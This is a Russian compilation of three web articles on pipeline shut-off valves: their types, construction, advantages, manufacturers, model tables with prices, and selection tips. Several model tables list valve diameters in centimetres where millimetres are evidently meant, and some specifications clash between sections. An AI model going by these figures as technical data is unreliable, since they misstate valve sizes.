Запорная арматура и ее применение в трубопроводных системах

Запорная арматура для трубопроводов

Под понятием «запорная арматура» подразумеваются устройства, управляющие силой потока некоторой среды. Чаще всего элементы запорной арматуры присутствуют на трубопроводах. Далее мы разберемся в том, на какие виды делится запорная арматура, что это такое и где применяется.

Запорная арматура на трубопроводах служит для управления потоками жидкостей или газов. Она способна регулировать поток в трубопроводных системах от минимального уменьшения подачи до полной ее остановки.

Некоторые виды этого оборудования:

  • задвижки чугунные;
  • регулирующие клапаны;
  • краны;
  • дисковые затворы.

Область применения

Все эти изделия широко используются в инженерных системах и могут изготавливаться как для общетехнического применения, так и для работы в особых условиях. Если задвижка используется только для полного перекрытия потока, то запорно-регулируемая арматура (клапаны и краны) способна не только перекрывать поток, но и регулировать его интенсивность.

Устройство

Все запорные устройства имеют похожую конструкцию. Это закрытый герметичный корпус, в котором размещен узел запорной арматуры.

В корпусе чаще всего имеется два (в ряде случаев больше) конца, посредством которых он плотно прикрепляется к трубопроводу. Назначение запорного узла — герметичное разделение трубопроводной системы на части.

В его составе имеются седло и запорный орган, постоянно соприкасающиеся по уплотнительным поверхностям.

Обратите внимание

Краны служат для установки на трубопроводах с водяными, паровыми и газовыми носителями. Они характеризуются компактными размерами (1-9 кг) и небольшим сопротивлением. Диаметр крана может быть от 1 до 3 дюймов. Наиболее распространены такие виды кранов, как шаровой и пробковый. В соответствии с методом герметизации они бывают сальниковыми и натяжными.

Соединение крана с трубопроводом происходит при помощи фланца, муфты или путем приваривания к нему. На газовых трубопроводах используются газовые муфтовые краны. Материалом для них служит чугун. Чтобы обеспечить соединение трубопровода с краном, требуется резьбовая муфта. Газовые краны предназначены для работы в условиях давления 0.1 Мпа и температуры до 50 °С.

Более высокие нагрузки выдерживают сальниковые муфтовые краны. Они обслуживают нефтепроводы и водопроводы, основные их детали изготавливаются из чугуна. При этом чугунный сальник набивают резиной или пенькой. Такие краны способны работать при давлениях до 1 Мпа и выдерживают температуры до 100 °С.

Самые малые размеры имеют шаровые краны. Это оборудование славится высоким качеством работы, что предопределило его использование в трубопроводах большого диаметра. Изготавливают их из чугуна, а уплотнительные кольца состоят из фторопласта-4. Рабочие параметры шаровых кранов соответствуют характеристикам сальниковых муфтовых кранов.

С помощью фланцев присоединяются к трубопроводам фланцевые стальные краны. Если кран имеет большие размеры, он снабжается червячным редуктором. Для регулировки потока в таком кране служит маховик.

Это оборудование применяется на газопроводах, работающих в диапазоне температур от -40 °C до +70 °С. Подобные краны монтируют только вертикально.

Управление может быть как дистанционное, так и посредством маховика.

Запорные клапаны

Клапаны играют важнейшую роль в большом количестве регуляторов трубопроводных сетей. Это самая распространенная запорная арматура. Что это такое, можно увидеть на картинке.

Это детали, у которых есть затвор, имеющий вид тарелки конусной или плоской формы, который двигается параллельно оси уплотнительной поверхности седла корпуса возвратно-поступательно или по дуге.

Вентиль — разновидность клапана, перемещение затвора которого осуществляется посредством резьбовой пары.

Важно

Наиболее распространены запорные вентили, устанавливаемые на трубопроводы. Регулировка в них происходит в ручном режиме с использованием маховика или дистанционно с помощью электропривода.

Прочность уплотнения обеспечивается кольцами, изготовленными из кожи, резины или фторопласта-4. Запорные вентили используются в трубопроводах, рабочей средой которых являются воздух, пар или вода. Для соединения с трубой применяется резьбовая муфта. Для заполнения сальника используется асбестовая набивка АП-31 – шнур из сплетенных асбестовых нитей с антифрикционной пропиткой.

В водопроводах с температурой воды менее 50 °С устанавливают запорные вентили муфтовые. Это оборудование способно работать в любом положении. При этом вода поступает под золотник. Корпус устройства чугунный, прокладки — паронитовые, уплотнительное кольцо сделано из кожи, а набивка сальников — асбестовая.

В трубопроводах для транспортировки воздуха или воды среда прогревается до температуры +45 °С. В таких инженерных сетях допустимо применение в запорной арматуре электромагнитного привода.

Он рассчитан на работу при температурах до +50 °С. Направлен он должен быть вверх. Корпус устройства – чугунный. При этом золотник и крышка изготавливаются из стали.

Такой вентиль управляется как вручную, так и дистанционно.

Заслонки предназначены для применения на трубопроводах большого диаметра. Их устанавливают в системах кондиционирования и вентиляции при небольших давлениях и невысоких требованиях к герметичности.

В зависимости от количества применяемых пластин заслонки бывают одинарными и многостворчатыми.

Для жидкостных сред заслонки практически не применяются, поскольку не могут в достаточной мере обеспечить герметичность перекрытия прохода. Для газов дроссельные заслонки применяют довольно часто.

Совет

Этому способствует простота и надежность конструкции. Назначение дроссельных заслонок — регулирование и отключение расхода.

Кроме простого устройства и управления, они имеют сравнительно невысокую цену и небольшой вес. Возможно оборудование заслонок гидроприводом, пневмоприводом или электроприводом.

На трубах, транспортирующих воду, ставятся бесфланцевые заслонки давлением 1,0 МПа. Уплотнение происходит посредством резинового кольца, устанавливаемого в канавке диска. Корпус изделия состоит из чугуна, а поворотный вал сделан из стали.

Заслонки, управляемые посредством электропривода, монтируют электроприводом вверх. При этом приводной вал располагается вертикально. Заслонки, которые управляются вручную, можно устанавливать в любом положении.

Соединение заслонок с трубопроводом происходит посредством фланцев. Другим способом соединения является сварка. Рабочее давление заслонок — 1 Мпа. Управлять ими можно с помощью электропривода.

Диаметр арматуры, использующей такой электропривод, составляет от 200-1200 мм. Их мощность достигает 5 кВт. Время, которое затрачивается заслонкой на открытие или закрытие, составляет примерно полторы минуты.

Затвор поворотный дисковый необходим для того, чтобы регулировать давление и расход среды. Рабочей средой для затвора являются вода и газ. Они работают при давлении 1.6 Мпа и температуре от -15 °C до 200 °C.

Затвор поворотный дисковый принадлежит к запорно-регулирующей арматуре. Находясь в закрытом положении, он дает возможность добиться герметичности. Достоинством затвора является его малая строительная длина и высота. Изделие применяется в системах отопления, водоснабжения и пищевой промышленности.

Обратите внимание

В инженерных сетях ставится и другая запорная арматура. Что это такое «задвижки» – один из видов трубопроводной арматуры?

Задвижка — представитель запорной арматуры, имеющий затвор в форме клина, диска или листа, который движется вдоль уплотняющих колец седла корпуса. Поток среды при этом перпендикулярен ходу затвора. Диаметр уплотнительных колец может быть меньше диаметра трубы, а может быть равен ему. В первом случае задвижки называются суженными, во втором – проходными.

В соответствии с формой затвора задвижки делят на параллельные и клиновые.

Эти изделия используются на технологических линиях и магистральных трубопроводах. Шпиндель в задвижках может быть невыдвижным или выдвижным. Чтобы закрыть или открыть проход, шпинделю приходится делать достаточно много оборотов.

Поэтому подобные задвижки снабжают электроприводом для дистанционного управления. Клиновые задвижки имеют невыдвижной шпиндель из чугуна. Их давление составляет 0,25 МПа. Диаметр арматуры — от 800 до 2000 мм, масса достигает 14 тн.

  • не требуется преодолевать давление рабочей среды при движении рабочего органа;
  • прямой поток среды, позволяющий минимизировать сопротивление в открытом состоянии;
  • симметричность конструкции.
  • сильное трение при движении рабочего органа задвижки;
  • большая строительная высота из-за того, что шток должен выдвигаться минимум на два диаметра трубы;
  • высокий износ затвора в промежуточном положении.

К трубе задвижки присоединяются при помощи фланцев. Большая часть деталей – чугунная. Материал прокладки – паронит, набивка сальника — асбест.

Трубопроводы, транспортирующие топливный газ с температурным режимом до 100 °С, используют двухдисковые клиновые задвижки чугунные. Они имеют невыдвижной шпиндель и рабочее давление 0,6 МПа. Предусматривают только ручное управление.

Аналогичные двухдисковые задвижки, но с выдвижным шпинделем ставятся на трубопроводы с коксовым газом. Они рассчитаны на работу при давлении 1,8 МПа и температуре 200 °С.

На нефтепроводы и маслопроводы устанавливаются сварные клиновые задвижки из стали. В их конструкции используется выдвижной шпиндель и патрубки. Максимальная температура среды для этих задвижек составляет 250 °С. Материалом всех деталей задвижки служит углеродистая сталь.

Агрессивные среды

Запорные приспособления, которые работают в условиях воздействия агрессивных сред, выбираются в зависимости от характеристик среды. В расчет принимается срок эксплуатации, герметичность, надежность и другие параметры, которыми обладает запорная арматура. Что это такое — запорное оборудование для агрессивных сред?

Вентили используются в агрессивных средах чаще всего. У таких изделий седло и золотник надежно сопрягаются, что позволяет избежать трения. На смену узлам сальников пришли сильфонные узлы. Недостатком такого вентиля является увеличенное гидравлическое трение.

В жидких средах используются муфтовые вентили из латуни, рассчитанные на рабочее давление 1,6 МПа. Такой вентиль присоединяется к трубопроводу посредством резьбовой муфты.

Важно

В паропроводах при давлении 1 МПа и температурах меньше 50 °С в вентилях используется латунное уплотнительное кольцо. Подобное кольцо на золотнике сделано резиновым или кожаным.

Сильфонные вентили, выполненные из стали, стойкой к коррозии, используются при температуре среды до 350 °С. Фланцевые фарфоровые вентили имеют корпус, изготовленный из фарфора.

Неисправности трубопроводной арматуры чреваты многими проблемами для эксплуатирующих предприятий. Нередко они не в состоянии перекрыть участок сети, который подвергся аварии. Неслучайно ремонт запорной арматуры, сделанный вовремя, помогает предприятию избежать больших расходов в дальнейшем.

Причины поломок

Ознакомимся с наиболее частыми причинами поломок запорной арматуры. В число причин, вызывающих поломки задвижек, входит мусор, попадающий внутрь трубопровода при монтаже. Он оседает на уплотнительных кольцах, прорезает там канавки, нарушающие герметичность.

Предотвратить это можно тщательно промыв магистральные сети до начала их эксплуатации. Вышедшие из строя задвижки ремонтируются в особых мастерских, которые оснащены притирочными станками.

Они снимают поврежденный слой с уплотнительных колец, возвратив им прежние свойства.

После произведенного ремонта и затяжки болтов, до того как будет произведена установка запорной арматуры, задвижка проходит гидравлические стендовые испытания под давлением. Если испытания заканчиваются успешно, происходит оформление акта приемки.

Изготовители

В России запорная и запорно-регулируемая арматура изготавливаются многими предприятиями. Отрасль постоянно растет. Одним из лидеров отрасли является завод запорной арматуры Also из Челябинска. Популярностью пользуется также продукция завода Ленпромарматура из Санкт-Петербурга, ЗАО Гидрогаз из Воронежа, ООО Муромского завода трубопроводной арматуры.

Запорная арматура, цена которой может составлять от 20 до нескольких десятков тысяч рублей в зависимости от диаметра, назначения и материала изделий, широко предлагается на рынке России и Европы.

Функционирование трубопровода требует его постоянного обслуживания. Для этого используют разные виды трубопроводной арматуры — предохранительную, спускную, запорную и т.д. К примеру, чтобы частично или полностью перекрыть движение рабочей среды в системе, применяют запорную арматуру для трубопроводов. О характеристиках и типах арматуры трубопроводов будет рассказано в этой статье.

Виды арматуры для трубопроводов

Выделяют следующие виды трубной арматуры:

  • регулирующая;
  • запорно-регулирующая;
  • невозвратно-запорная;
  • запорная;
  • предохранительная;
  • обратная;
  • невозвратно-управляемая;
  • смесительно-распределительная;
  • дренажная (спускная);
  • отводная;
  • отключающая (защитная);
  • редукционная (дроссельная);
  • фазоразделительная;
  • контрольная.

Как нетрудно догадаться, каждая разновидность продукции предназначена для определённых целей, которым соответствует и устройство трубопроводной арматуры.

Например, запорную трубопроводную арматуру используют для перекрытия движения рабочей среды (или совокупности сред) с целью проведения профилактических работ в сети.

Предохранители служат для защиты трубопровода от превышения рабочего давления, в результате которого система может выйти из строя, путём сброса излишков перемещаемой среды.

Совет

Регулирующая арматура предназначена для поддержания нужного количества носителя с помощью изменения его расхода.

Возникновение возвратного потока, снижающего производительность системы, предотвращается обратными элементами (в частности, невозвратно-запорными и невозвратно-управляемыми).

Сброс из трубопроводной системы рабочей среды осуществляется путём использования спусковых, или дренажных, приспособлений.

Разделение фаз (при условии, что в трубах перемещается несколько фазовых состояний среды) производится при помощи фазоразделительных элементов.

Рабочее давление в системе при необходимости снижается благодаря применению редукционной арматуры.

Типы трубопроводной арматуры

Сфера использования арматуры для трубопроводов достаточно широка, она используется во всех типах промышленных трубопроводов, в том числе и в технологически опасных производствах (при перемещении ядовитых, взрывчатых, экологически опасных веществ). Поэтому характеристики трубопроводной арматуры должны полностью соответствовать государственным стандартам безопасности. Обычно производством таких изделий занимаются крупные предприятия.

Сообразуясь с планируемым применением трубной арматуры, выделяют продукцию:

  1. Общетехнического применения.
  2. Для особых условий.
  3. Промышленную специальную.
  4. Судовую и транспортную.
  5. Промышленную сантехническую.

Изделия общего назначения производятся серийно и могут применяться в любой сфере производства.

Источник: https://vsjaarmatura.ru/zapornaya-armatura/zapornaya-armatura-dlya-truboprovodov.html

Запорная арматура для трубопроводов — Школа по утеплению дома

ГлавнаяТрубы для отопленияЗапорная арматура для трубопроводов

20.12.2016

Под запорной арматурой подразумевается одна из вариаций арматуры, предназначающаяся для трубопроводов. Главное предназначение такой арматуры заключается в том, чтобы полностью перекрывать проходные отверстия в трубах, а также повторно их (отверстия) открывать.

Благодаря этому поток жидкости, перемещающийся по магистрали, останавливается, при этом проходное отверстие полностью герметизируется.

Что характерно, управлять можно не только, скажем, водой, но и паром, газом, иными жидкостями, продуктами нефтеперерабатывающей промышленности и так далее.

Обратите внимание

Запорная арматура для трубопроводов

Итак, сегодня мы выясним, что собой представляет запорная арматура для трубопроводов, в чем ее особенности, какие виды существуют и сколько примерно это будет стоить. Начнем с некоторых ознакомительных моментов.

Особенности запорной арматуры для трубопроводов

Запорная арматура активно применяется при оборудовании систем, рассчитанных на транспортировку разных веществ. По своему предназначению, к слову, вся арматура бывает не только запорной, но также и отводной, для предохранения, регулировочной и проч. Помимо того, данные изделия незаменимы при проведении ремонта магистрали.

Что характерно, устанавливать арматуру можно на трубопроводы как с высоким, так и с низким давлением. В любом случае главное качество, которым должна обладать любая запорная арматура, считается способность полностью закрывать/открывать проход в трубе. Регулировка интенсивности потока транспортируемого вещества возможна не со всеми типами таких устройств.

Ключевые разновидности запорной арматуры для трубопроводов

В целом, вся трубная арматура делится на целый ряд разновидностей; если говорить конкретнее, то она может быть:

  • запорной;
  • контрольной;
  • предохранительной;
  • дроссельной;
  • регулировочной;
  • отключающей;
  • запорно-регулировочной;
  • отводной;
  • обратной;
  • фазоразделительной;
  • невозвратно-запорной;
  • дренажной;
  • распределительно-смесительной;
  • и, наконец, невозвратно-управляемой.

С тем, каково предназначение конкретно запорной арматуры, мы уже разобрались. Что же касается предохранительной, то она необходима для автоматической защиты приборов и каналов от чрезмерно высокого рабочего давления посредством сброса «лишнего» объема транспортируемого вещества. Регулировочная же арматура корректирует характеристики вещества при помощи изменения расхода.

Посредством обратной арматуры предотвращается возвратное движение потока в автоматическом режиме. Эти изделия делятся на несколько подвидов, одни из которых принудительно закрывают проход, а другие – ограничивают его либо открывают.

Посредством дренажных элементов рабочая среда сбрасывается из магистралей или же емкостей. А если эта среда имеет разные фазовые состояния, то ее разграничивают посредством фазоразделительной арматуры.

Наконец, редукционные элементы снижают рабочее давление в сети, повышая для этого проточную часть гидросопротивления.

Как видим, запорная арматура для трубопроводов является далеко не единственной в своем роде.

Промышленная запорная арматура для труб – в чем ее особенности?

Ввиду того, что арматура для труб в виде готового продукта должна полностью соответствовать всем требованиям безопасности и нормативной документации, ее изготовлением в большинстве случаев занимаются только крупные предприятия. Для того чтобы производить данные элементы в промышленных масштабах, нужна возможность управления процессом дистанционно, автоматический рабочий режим и максимально высокая надежность.

Здесь появляется еще одна классификация арматуры. Так, по сфере своей эксплуатации может быть:

  • общетехнической;
  • промышленной сантехнической;
  • для эксплуатации в особых условиях;
  • судовой/транспортной;
  • промышленной специальной.

Продукция первой категории производится преимущественно серийно и может применяться во всех возможных сферах. Что же касается арматуры, предназначенной для эксплуатации в особых условиях, то она используется в энергосистемах с повышенными техническими характеристиками, а еще в случаях, когда ремонтируются/устанавливаются транспортные магистрали для агрессивных или токсичных веществ.

Особые требования выдвигаются к транспортным/судовым элементам. Они изготавливаются с учетом размеров и массы изделий, а также иных параметров, в том числе возможности использования в разных климатических зонах. Наконец, промышленная специальная продукция проектируется и создается под заказ для конкретных организаций и ведомств.

Как производятся элементы?

Для изготовления запорной трубопроводной арматуры используется сталь (если показатель давления в сети составляет более 1600 кПа) или же ковкий чугун (если не превышает эту отметку).

Говоря конкретнее, для изготовления описываемой в статье арматуры необходимы такие инструменты и агрегаты:

  • печь;
  • воздушный компрессор (он требуется для покраски);
  • пресс;
  • ленточный конвейер;
  • диагностический станок;
  • токарный/сверлильный станок;
  • сборочный стол;
  • иные мелкие инструменты.

Каналы незначительных габаритов и диаметра могут ремонтироваться/обслуживаться благодаря запорным элементам, изготавливаемых с применением сплавов бронзы и меди отменного качества. Эти сплавы не допускают деструкции элементов вследствие ржавления, поэтому изделия не «прикипают» к корпусу.

Технические характеристики запорной трубопроводной арматуры

Начать следует с того, что любая запорная арматура для трубопроводов состоит из следующих конструктивных элементов:

  • корпус, на котором расположены патрубки;
  • собственно, привод;
  • запорный элемент;
  • система, которая управляет приводом.

Что же касается различий между отдельными типами арматуры, то они заключаются в конфигурации запорного элемента, а также в способе его передвижения. Рассмотрим ключевые различия более детально, параллельно знакомясь с характеристиками некоторых моделей.

Клапаны

Они, как можно уже догадаться, необходимы, чтобы полностью открывать/перекрывать проход магистрали. Если требуется регулировка интенсивности движения рабочей среды, используются особые регулировочные клапаны.

Есть еще универсальные элементы (их также называют комбинированными), способные как закрывать проход полностью, так и регулировать его. Само запорное устройство здесь выполнено в виде золотника, который двигается в направлении потока поступательно.

Управлять такой арматурой можно как вручную, так и при помощи привода (электрического, электромагнитного, пневматического, гидравлического), либо же с применением механических приспособлений.

К достоинствам таких клапанов можно отнести:

  • малый ход затвора;
  • удобство эксплуатации, обслуживания;
  • надежность;
  • малый вес, незначительные габариты;
  • простоту конструкции;
  • незначительный износ;
  • высокую степень герметичности.

Однако есть и недостатки, среди которых:

  • возможность применения только в трубопроводах малого диаметра;
  • возможное скопление мелких частиц, ржавчины в некоторых местах;
  • повышенное гидросопротивление (если сравнивать с теми же шаровыми кранами).

Несколько популярных моделей клапанов приведены ниже, для удобства посетителей информация приведена в виде таблицы.

Таблица №1. Модели запорных клапанов, характеристики, среднерыночные цены.

Наименование, иллюстрация Основные характеристики Среднерыночная стоимость, в рублях
Латунный клапан 15Б1П/М ВР/ВР БАЗ Вес элемента составляет 280 граммов, диаметр – 20 сантиметров. Может использоваться в отопительных, водопроводных сетях, а также в тепловых пунктах. 168,86
Латунный подпиточный клапан R150 ВР GIACOMINI Изделие весом 500 граммов и диаметром 15 сантиметров. Оптимальный вариант для систем отопления, пожаротушения, водопроводных магистралей. 2559,89
Латунный клапан 15Б3Р ВР/ВР STC Изделие весом от 380 граммов до 1,38 килограмма. Диаметр может составлять 25 и 50 сантиметров. Применение – отопительные системы, системы пожаротушения, тепловые пункты. От 153,16 до 559,67
Чугунный клапан 15КЧ16НЖ ФЛ САЗ Весьма громоздкий элемент – его вес составляет 25 килограммов. Диаметр – 65 сантиметров. Предназначение то же, что и в предыдущих случаях. 6525,40
Чугунный клапан 15КЧ33П ВР/ВР ЗАЗ Изделие весом 1,6 килограмма и диаметром 32 сантиметра. Рассчитано на отопление, пожаротушение, а также на тепловые пункты. 292,29
Чугунный клапан 215 ФЛ ZETKAMA Элемент, вес которого начинается от 3,15 килограмма, а диаметр варьируется в пределах от 15 до 300 сантиметров. От 2283,06 до 156943,30
Стальной клапан 15С52НЖ9 ФЛ АРКОР Вес данного изделия составляет 10,8 килограмма, в то время как диаметр – 25 сантиметров. 4302,40

Как видим, такая запорная арматура для трубопроводов, как клапаны, производится в достаточно большом ассортименте, следовательно, ценовая вилка немалая. Переходим к следующей разновидности.

Краны

Все краны имеют практически одну и ту же конструкцию. Здесь имеется собственно корпус, а также затвор, который и перекрывает поток жидкости. Такие краны могут быть разными (конусными, шаровыми цилиндрическими), останавливаться на этом не будем.

Что же касается преимуществ, то к таковым относится:

  • возможность применения в любой рабочей среде;
  • простая конструкция;
  • легкость в обращении;
  • незначительные габариты;
  • быстрое закрытие/открытие.

Таблица №2. Модели запорных кранов, характеристики, среднерыночные цены.

Наименование, иллюстрация Основные характеристики Среднерыночная стоимость, в рублях
Латунный шаровой кран 1008 ВР AQUASFERA Угловое изделие с затвором типа «бабочка», весом 169 граммов и диаметром 15 сантиметров. Может использоваться во всех системах, в том числе в санитарных узлах. 182,78
Шаровой кран из стали 11С67П РУ16 ФЛ (оснащается редуктором «Титан») Изделие со стандартным проходом, весит целых 153 килограмма и имеет диаметр в 300 сантиметров. Используется в разного рода крупных сетях. 87017,09
Поплавковый чугунный кран RF3241 РУ16 ФЛ TECOFI Прямой элемент (поплавок в данном случае изготовлен из нержавеющей стали) весом в 17 килограммов и диаметром в 50 сантиметров. Используется исключительно в водопроводных магистралях. 45794,62
Латунный шаровой кран 1012 ВР (с полным проходом рычага «Аквасфера») Качественное изделие из латуни, диаметр которого составляет от 15 до 25 сантиметров. Может использоваться в разных трубопроводах. От 233,99 до 547,52
Кран из латуни для манометра 159 ICMA Трехходовый элемент с типом соединения ВР/НР. Вес изделия составляет 280 граммов, диаметр – 15 сантиметров. 621,51
Латунный кран пробно-спускного типа 10Б19БК1 ПАЗ Вес данного элемента составляет 645 граммов, диаметр – 20 сантиметров. Является представителем конусных запорных кранов. Применяется во многих типах трубопроводов. 612,42
Водозаборный кран из латуни ВР Элемент настенного типа, который весит 144 грамма и имеет диаметр в 15 сантиметров. Применяется исключительно в системах водоснабжения, комплектуется специальной прокладкой. 142,54

Затворы

Они способны не только перекрывать, но и выполнять регулировку напора рабочей жидкости в сети. В качестве запора в данном случае выступает круглый диск, поворачивающийся под углом 90 градусов относительно движения вещества в трубопроводе. К диску посредством особого вала подключен поворотный механизм, регулирующий угол его расположения, что, в свою очередь, расширяет/сужает сам проход.

Эта запорная арматура для трубопроводов имеет следующие преимущества:

  • возможность применения в трубопроводах любых диаметров;
  • простота эксплуатации, ремонтных работ;
  • незначительные размеры;
  • простота конструкции.

Однако имеются и минусы, среди которых:

  • относительно плохая герметизация;
  • необходимость применения специальных редукторов для сетей большого диаметра;
  • трудности с очисткой.

Таблица №3. Модели затворов, характеристики, среднерыночные цены.

Наименование, иллюстрация Основные характеристики Среднерыночная стоимость, в рублях
Поворотный затвор дискового типа 28.21 МЕЖФЛ КВО-АРМ Изделие, которое весит 4 килограмма и имеет большой диаметр – 80 сантиметров. Затвор выполнен в виде рукоятки. Применяется в трубопроводах различного назначения. 5846,43
Поворотный затвор дискового типа ВА МЕЖЛФ Вес данного элемента составляет уже 9,6 килограмма. Затвор здесь оснащен редуктором (о нем мы только что говорили), показатель диаметра составляет 50 сантиметров. 1081,00
Затвор поворотный дискового типа VFY-WA(SYLAX) МЕЖФЛ DANFOSS Диаметр этого изделия составляет 25 сантиметров, вес – 4, 105 килограмма. Выполнено из нержавеющей стали, привод электрический (на 230 вольт). 57678,28

Задвижки

Они по праву считаются самыми простыми приспособлениями и используются для того, чтобы перекрывать движение среды по трубопроводу. Применимы к любого рода веществам.

Рабочее запорное устройство в них может изготавливаться не только из стали, но и из «нержавейки», чугуна, а также из цветных металлов. Что же касается корпуса, то он может быть лишь либо чугунным, либо стальным.

Шток бывает выдвижным и невыдвижным.

Также заметим, что задвижка может быть:

  • шланговой;
  • клиновой;
  • параллельной;
  • шиберной.

К достоинствам можно отнести:

  • низкое гидросопротивление;
  • универсальность;
  • незначительный показатель трения;
  • малую длину;
  • простоту конструкции.

Но имеются и недостатки, среди которых:

  • быстрый износ;
  • большая высота;
  • длительное открытие/закрытие.

Таблица №4. Модели задвижек, характеристики, среднерыночные цены.

Наименование, иллюстрация Основные характеристики Среднерыночная стоимость, в рублях
Стальная задвижка ЗКЛ2-63 31С18НЖ ФЛ РУ63 АРЗИЛ Весит данный элемент целых 45 килограммов, следовательно, и диаметр его достаточно большой – 50 сантиметров. Предназначается для различных сетей. 3122,52
Задвижка шиберная, выполненная из «нержавейки», МЕЖФЛ VG6400-03EP TECOFI Вес вообще просто огромен – 209 килограммов. Диаметр составляет 500 сантиметров. Применяется в системах водоотведения. 198705,57
Латунная задвижка ВР/ВР РУ20 ITAP Вес этого элемента составляет 694 грамма, в то время как диаметр – 40 сантиметров. 475,54
Задвижка латунная V1141 ВР/ВР РУ16 TECOFI Последнее изделие выпускается сразу в восьми модификациях, диаметр которых колеблется в пределах от 20 до 100 сантиметров. Применяются в трубах различного назначения. От 946,71 до 15736,36

Видео – Различные типы арматуры для применения в трубопроводах

В качестве заключения. ключевые правила выбора арматуры

Если вы планируете приобрести запорную арматуру для трубопроводов, то должны знать, прежде всего, каковы способы ее соединения сегодня существуют. Ознакомимся вкратце с каждым из них.

  • Сварное. По праву считается самой прочной методикой соединения. Используется преимущественно для тех магистралей, которые находятся под высоким давлением. Что характерно, арматура должна иметь в данном случае предельный эксплуатационный срок, так как демонтировать сварные соединения, что вполне очевидно, крайне сложно.
  • Муфтовое. Здесь элементы могут быть как с внешней, так и с внутренней резьбой. Помимо того, существуют специальные съемные муфты, что лишь упрощает дело. В большинстве случаев муфтовую арматуру применяют там, где диаметр трубопровода составляет не более 5-ти сантиметров.
  • Фланцевое. Оно является самым качественным и надежным вариантом. Более того, для установки или же замены требуется совсем немного времени. Крепеж осуществляется посредством гаек и болтов.

Видео – Арматура запорная «Вальтек»

Источник: https://v-teplo.ru/zapornaya-armatura.html

Запорная арматура: что это такое, виды и классификация кранов и типы подсоединения к трубопроводам

Мы приветствуем нашего читателя и постараемся  рассказать в этой статье о видах запорного оборудования для домашних трубопроводных систем, как его менять и обслуживать.

Жизнь современного цивилизованного человека невозможна без многочисленных трубопроводов, подводящих к дому холодную и горячую воду и газ.

Важно

Работа промышленных предприятий, добывающей промышленности, общественных зданий, социальной сферы невозможно представить без трубопроводов.

Но поток воды, топлива, пара не может течь бесконечно долго – его нужно перекрывать. И здесь на помощь человеку приходит запорная арматура.

Что это такое?

Это вид трубопроводной арматуры, предназначенной для управления потоком жидкости или газа (в условиях дома – потока газа, холодной или горячей воды); иногда для спуска избыточного давления или воздуха из системы.

Область применения запорной арматуры

Аксиома: любая система трубопроводов должна перекрываться с двух сторон. Если система большая, то должны автономно перекрываться части системы. Отсюда следует, что на любом трубопроводе  будет стоять арматура.

Ее область применения:

  • для магистральных систем водоснабжения, отопления, канализации, газовой системы в быту, промышленности, инфраструктуре городов (общественных зданиях);
  • для внутренних систем в жилых помещениях.
  1. Промышленного назначения. Нет вида промышленности, добывающего комплекса, сельского хозяйства, строительства, транспорта, в которых не было бы трубной арматуры. На любом заводе  существует система водоснабжения и  отопления с котлами и насосами; пневмопривод, система подачи сжатого воздуха и другое оборудование, которое не существует без задвижек и вентилей.

Классификация и виды

Запорные  устройства бывает следующих типов:

  • краны;
  • вентили и запорные клапаны ( с 1982 года в техническом языке применяют термин «клапан», но для удобства читателя будем применять оба);
  • задвижки;
  • заслонки (поворотные затворы).

Классификация устройств по назначению:

  • регулирующие:
  • защитные;
  • распределительная;
  • предохранительные.

Классификация по методу установки:

  • муфтовые (на резьбе);
  • на фланцах;
  • на сварке.

Устройство запорной арматуры

Краны состоят из корпуса, рукояти, запорного элемента (шарика или конуса), комплекта уплотнительных прокладок. Запорный элемент вращается вокруг оси, произвольно расположенной относительно потока жидкости или газа.

Вентили и запорные клапаны состоят из корпуса сложной конструкции, седла внутри корпуса, запирающего элемента, плотно прилегающего к седлу и перекрывающего поток среды, шпинделя, рукоятки.  Запирающий элемент перемещается параллельно оси потока рабочей среды.

Заслонка – дисковый затвор, запирающий элемент имеет форму диска и вращается вокруг оси, перпендикулярной или расположенной под углом к направлению потока рабочей среды.

Принцип работы

Принцип работы основан на полном или частичном перекрытии потока среды (газа, жидкости) с помощью арматуры в зависимости от ее назначения.

Регулирующая арматура просто изменяет или прекращает подачу среды; защитная защищает потребителя от создания аварийных ситуаций и обратного тока среды; распределительная перераспределяет или смешивает потоки среды; предохранительная защищает оборудование от повышенного давления.

Преимущества и недостатки

Вся информация для удобства сведена в таблицу 1.

Таблица 1

Наименование Преимущества Недостатки
Краны небольшие габариты нельзя использовать шаровые краны при высоких температурах (200°С)
простая конструкция нельзя использовать конусные краны при давлении выше 1,6 МПа
применимы для вязких и загрязненных сред допустимый рабочий диаметр конусных кранов до 100 мм
быстрое открытие/закрытие прохода недостаточная герметичность для применения в газовых системах
небольшая стоимость
малое гидравлическое сопротивление
Вентили/клапаны достаточно простая конструкция используются для небольших диаметров
небольшая строительная высота и масса высокое гидравлическое сопротивление
высокая герметичность и возможность применения для газовых трубопроводов наличие застойных зон, скопление в них примесей и усиление коррозии
небольшой износ уплотнительных поверхностей
относительная простота обслуживания и ремонта
возможность использования в вакууме и до давления 250 Мпа, при температурах от — 200°С до 600°С
Задвижки относительно простая конструкция значительная строительная высота (ход затвора составляет не менее одного диаметра прохода трубы)
небольшая строительная длина длительное время открытия и закрытия
малое гидравлическое сопротивление сложность ремонта  
высокая надежность и возможность эксплуатации в самых разных условиях (до 25 Мпа и 565°С) изнашивание рабочих поверхностей в корпусе  и затворе
Заслонки относительная простота конструкции диск в положении «открыто» увеличивает гидравлическое сопротивление
относительная простота ремонта, возможность быстрой смены уплотнений тяжелое управление запирающим элементом
малые строительные длина и масса
возможность применения в трубопроводах большого диаметра

Срок службы

Срок службы качественных изделий может исчисляться десятками лет. Но не стоит покупать на рынке «что попроще». Цена изделий и материалов  не так велика, а экономия может обойтись дорого.

Советы по выбору

Выбор оборудования для частного дома – личное дело каждого домашнего мастера. Сначала необходимо определиться, из какого материала выполнены отопительная и водопроводная системы. На канализационную систему в частном доме и тем более квартире никакие затворы  не устанавливаются.

Системы отопления и водоснабжения дома обычно выполнены из стали, пластика, иногда меди. Чугунные трубы встречаются только в старых водопроводных магистралях – на них ставят специальные стальные хомуты с резьбой).

Для пластиковых трубопроводов имеются пластиковые краны, монтируемые методом пайки. Возможен монтаж арматуры через МРВ и МРН – большим плюсом является возможность легкой смены крана.

Для подключения радиаторов отопления существуют конструкции, совмещенные с МРН, накидной гайкой  и пластиковым уголком, монтируемые с помощью сварки.

Придя в крупный магазин стройматериалов, мы увидим большой ассортимент бронзовых кранов и задвижек. Стальные и тем более чугунные изделия маленьких диаметров обычно отсутствуют. Бронзовые вентили также встречаются редко.

И обоснованно – бронзовые краны недороги, компактны, надежны, долговечны, не ржавеют. Пластиковые обладают аналогичными качествами.

Задвижки выбирают редко, обычно на трубу ввода воды или ввода теплоносителя с условным диаметром 25 мм и больше.

В общем, выбор за домашним мастером.

Монтаж запорной арматуры своими руками

